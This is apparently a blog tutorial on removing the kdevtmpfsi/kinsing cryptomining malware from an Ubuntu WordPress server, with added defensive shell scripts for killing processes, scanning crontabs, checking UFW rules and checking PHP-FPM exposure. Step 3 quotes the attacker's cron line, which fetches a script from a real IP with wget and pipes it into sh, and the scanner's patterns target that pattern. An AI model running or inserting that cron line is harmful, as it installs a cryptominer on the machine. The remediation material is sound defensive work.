How to Fix the kdevtmpfsi and kinsing Mining Virus Infection on an Ubuntu Server

My server is running Ubuntu 24. Today, after installing and configuring a WordPress blog based on Nginx 1.24, PHP 8.3, and MySQL 8.0, I ran the following command to check the server load:

$ top -i

I noticed that the kdevtmpfsi process was using 100% of the CPU. A quick search revealed that this is a malicious mining process. Typically, two malicious mining processes—kdevtmpfsi and kinsing—are found together. Here’s how I resolved the issue:

Step 1: Kill the kdevtmpfsi and kinsing Processes

First, find the process ID (PID) for kdevtmpfsi and kill it. The bracketed pattern stops grep from matching its own command line, and xargs -r skips the kill when nothing is found:

$ ps aux | grep '[k]devtmpfsi' | awk '{print $2}' | xargs -r sudo kill -9

Next, find the PID for kinsing and kill it the same way:

$ ps aux | grep '[k]insing' | awk '{print $2}' | xargs -r sudo kill -9

Step 2: Find and Remove the Malicious Program Files

Now, search for and remove any files associated with kdevtmpfsi and kinsing. The patterns are quoted so the shell does not expand them in the current directory before find sees them:

$ sudo find / -iname 'kdevtmpfsi*' -exec rm -fv {} \;
$ sudo find / -iname 'kinsing*' -exec rm -fv {} \;

The output should look like this:

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'
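Steps 1 and 2 in one reusable form, as an added example that is not part of the original post. The function names (find_pids_by_comm, describe_pid, kill_by_comm, remove_files_named) are my own. It reads process names from /proc/PID/comm instead of grepping ps output, so it cannot match itself, and it shows where each process's executable really lives, which is useful because droppers of this kind often delete their own binary after starting (the exe link then ends in "(deleted)"). The file removal prunes /proc and /sys and passes the name pattern quoted, as in the corrected find commands above.

```shell
#!/bin/sh
# Added example (not from the original post): locate processes by the name
# the kernel reports for them, describe them, stop them, and remove files
# matching a name prefix.

# Print the PIDs of all processes whose /proc/PID/comm equals NAME.
# Walking /proc avoids the "grep matches its own grep" problem of
# `ps aux | grep NAME | awk '{print $2}'`.
find_pids_by_comm() {
    name="$1"
    for p in /proc/[0-9]*; do
        pid="${p#/proc/}"
        [ "$pid" = "$$" ] && continue                 # skip this shell
        read -r comm < "$p/comm" 2>/dev/null || continue   # process may be gone
        [ "$comm" = "$name" ] && echo "$pid"
    done
}

# Describe one PID: command name, the executable it was started from
# (a self-deleting dropper shows "... (deleted)" here), and its cwd.
describe_pid() {
    pid="$1"
    printf 'pid=%s comm=%s exe=%s cwd=%s\n' "$pid" \
        "$(cat "/proc/$pid/comm" 2>/dev/null)" \
        "$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')" \
        "$(readlink "/proc/$pid/cwd" 2>/dev/null || echo '?')"
}

# Log and SIGKILL every process named NAME; prints how many were killed.
kill_by_comm() {
    name="$1"; killed=0
    for pid in $(find_pids_by_comm "$name"); do
        describe_pid "$pid" >&2
        kill -9 "$pid" 2>/dev/null && killed=$((killed + 1))
    done
    echo "$killed"
}

# Remove regular files below ROOT whose basename starts with NAME
# (case-insensitive, like the post's -iname). /proc and /sys are pruned
# because find should never descend into them, and the pattern is quoted
# so the shell cannot expand it in the current directory.
remove_files_named() {
    root="$1"; name="$2"
    find "$root" \( -path /proc -o -path /sys \) -prune -o \
        -type f -iname "${name}*" -exec rm -fv {} +
}
```

Run it as root against the names from the post, in the same order the post uses: kill_by_comm kdevtmpfsi; kill_by_comm kinsing; remove_files_named / kdevtmpfsi; remove_files_named / kinsing. Read the describe_pid lines it prints to stderr before the kill: the exe and cwd paths tell you which directories to inspect for leftovers.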

Step 3: Check for Scheduled Tasks Set by www-data User

The top -i command showed that the user running the kdevtmpfsi process was www-data, so I checked the scheduled tasks for this user:

$ sudo crontab -l -u www-data

I found the following task:

* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

This cron job downloads and executes the unk.sh script, which in turn downloads and runs the kdevtmpfsi and kinsing programs. To remove this scheduled task, I ran:

$ sudo crontab -r -u www-data

Then, I deleted the unk.sh script:

$ sudo find / -iname unk.sh -exec rm -fv {} \;
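Step 3 only looked at the www-data crontab. As an added example, not from the original post, here is a scanner that flags the "fetch with wget or curl and pipe into a shell" pattern in every crontab file under a directory, so root's crontab, /etc/cron.d and /etc/crontab get the same check. The function names and the detection rules are mine; the sample files in the usage are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): find cron entries that pull
# remote content straight into a shell, like the www-data entry above.

# Print "FILE:LINENO: LINE" for each non-comment crontab line that either
#  - runs wget/curl and pipes the result into sh or bash, or
#  - references a URL with a bare IPv4 address (no hostname).
scan_crontab_file() {
    awk -v f="$1" '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }          # comments, blanks
        /(wget|curl)[^|]*[|][[:space:]]*(ba)?sh/ { print f ":" NR ": " $0; next }
        /https?:\/\/[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/ { print f ":" NR ": " $0 }
    ' "$1"
}

# Scan every regular file under DIR. Prints the hits and returns 1 if there
# were any, 0 if the directory is clean.
scan_crontab_dir() {
    hits=$(find "$1" -type f | while IFS= read -r f; do scan_crontab_file "$f"; done)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}
```

On Ubuntu the per-user tables live in /var/spool/cron/crontabs (readable only by root), so run it as root: scan_crontab_dir /var/spool/cron/crontabs; scan_crontab_dir /etc/cron.d; scan_crontab_file /etc/crontab. A non-zero exit means there is something to read before deciding what to remove.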

Step 4: Create Non-Executable Placeholder Files for kdevtmpfsi and kinsing

To prevent the kdevtmpfsi and kinsing files from being executed again, I created them as non-executable placeholder files and set them to read-only:

$ touch /tmp/kdevtmpfsi && touch /tmp/kinsing
$ echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
$ echo "kinsing is fine now" > /tmp/kinsing
$ chmod 0444 /tmp/kdevtmpfsi
$ chmod 0444 /tmp/kinsing

This ensures that these files are no longer executable and cannot run.

Step 5: Enable UFW Firewall and Block Malicious IP

I enabled the UFW firewall and blocked access from the IP address 185.122.204.197, which was being used for the malicious downloads:

$ sudo ufw allow ssh
$ sudo ufw enable
$ sudo ufw allow http
$ sudo ufw allow https
$ sudo ufw deny from 185.122.204.197

To check the UFW status:

$ sudo ufw status numbered
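Two details of the rule order above are worth checking, and the following is an added example for doing so, not part of the original post. UFW evaluates rules in order and stops at the first match, so a deny rule appended after "ufw allow http" and "ufw allow https" does not apply to ports 80 and 443; "sudo ufw insert 1 deny from IP" places it first. Also, "ufw deny from" only filters inbound traffic, while the cron job made an outbound connection to that address, which UFW's default outgoing policy permits; "sudo ufw deny out to IP" closes that direction. The check below parses the text of "ufw status numbered" from stdin; the function name is mine and the status listings in the usage are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): verify that a blocked address
# is denied before any ALLOW IN rule and is also denied outbound.
# Usage: sudo ufw status numbered | check_ufw_block 185.122.204.197
# Returns 0 when both hold, 1 otherwise, and prints what is missing.
check_ufw_block() {
    awk -v ip="$1" '
        # numbered rule lines look like: [ 4] Anywhere   DENY IN   1.2.3.4
        /^\[ *[0-9]+\]/ {
            n++
            if ($0 ~ /ALLOW IN/ && !first_allow) first_allow = n
            if ($0 ~ /DENY IN/ && index($0, ip) && !deny_in) deny_in = n
            if ($0 ~ /DENY OUT/ && index($0, ip)) deny_out = n
        }
        END {
            ok = 1
            if (!deny_in) {
                print "no inbound deny rule for " ip " (ufw insert 1 deny from " ip ")"
                ok = 0
            } else if (first_allow && first_allow < deny_in) {
                print "inbound deny for " ip " is rule " deny_in \
                      " but ALLOW IN rule " first_allow " matches first" \
                      " (ufw insert 1 deny from " ip ")"
                ok = 0
            }
            if (!deny_out) {
                print "no outbound deny rule to " ip " (ufw deny out to " ip ")"
                ok = 0
            }
            if (ok) print "block of " ip " is complete"
            if (ok) exit 0
            exit 1
        }'
}
```

Blocking one address is only a stopgap: the dropper can be served from anywhere, so the fix that matters is removing the cron entry and closing the exposure in Step 6.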

Step 6: Restrict PHP-FPM to Localhost

According to online resources, this issue is likely due to the php-fpm service exposing port 9000 to the internet. To fix this, I edited the php-fpm configuration file:

$ sudo vim /etc/php/8.3/fpm/pool.d/www.conf

I changed the following line:

listen = 9000

to:

listen = 127.0.0.1:9000

This restricts php-fpm to listening only on the loopback address 127.0.0.1, so Nginx on the same host can still reach it but nothing on the network can. To apply the changes, I restarted the php-fpm service:

$ sudo systemctl restart php8.3-fpm
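A way to check a pool file for the exposed setting before and after the edit, as an added example that is not part of the original post. A bare port such as "9000", "0.0.0.0:PORT" or "[::]:PORT" binds every interface; "127.0.0.1:PORT", "localhost:PORT", "[::1]:PORT" or a unix socket path stays local. The function name is mine, and it reads the last uncommented "listen =" line in the file.

```shell
#!/bin/sh
# Added example (not from the original post): classify the listen address
# of a PHP-FPM pool file. Prints "exposed", "local", "unset" or "other (...)"
# and returns 1 only for "exposed", so it can gate a deployment script.
fpm_listen_scope() {
    conf="$1"
    # take the last uncommented "listen = VALUE" line; "listen.owner" etc.
    # do not match because a "." follows the word there
    val=$(sed -n 's/^[[:space:]]*listen[[:space:]]*=[[:space:]]*//p' "$conf" | tail -n 1)
    val=$(printf '%s' "$val" | sed 's/[[:space:]]*$//')     # trim trailing blanks
    case "$val" in
        "")                               echo unset;   return 0 ;;
        /*)                               echo local;   return 0 ;;  # unix socket
        127.*:*|localhost:*|\[::1\]:*)    echo local;   return 0 ;;
        0.0.0.0:*|\[::\]:*|[0-9]*)        echo exposed; return 1 ;;  # any interface or a non-loopback IP
        *)                                echo "other ($val)"; return 0 ;;
    esac
}
```

Usage: fpm_listen_scope /etc/php/8.3/fpm/pool.d/www.conf. After the restart, confirm what the service actually bound with "sudo ss -ltnp | grep 9000": the local address column should read 127.0.0.1:9000, not 0.0.0.0:9000 or *:9000.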
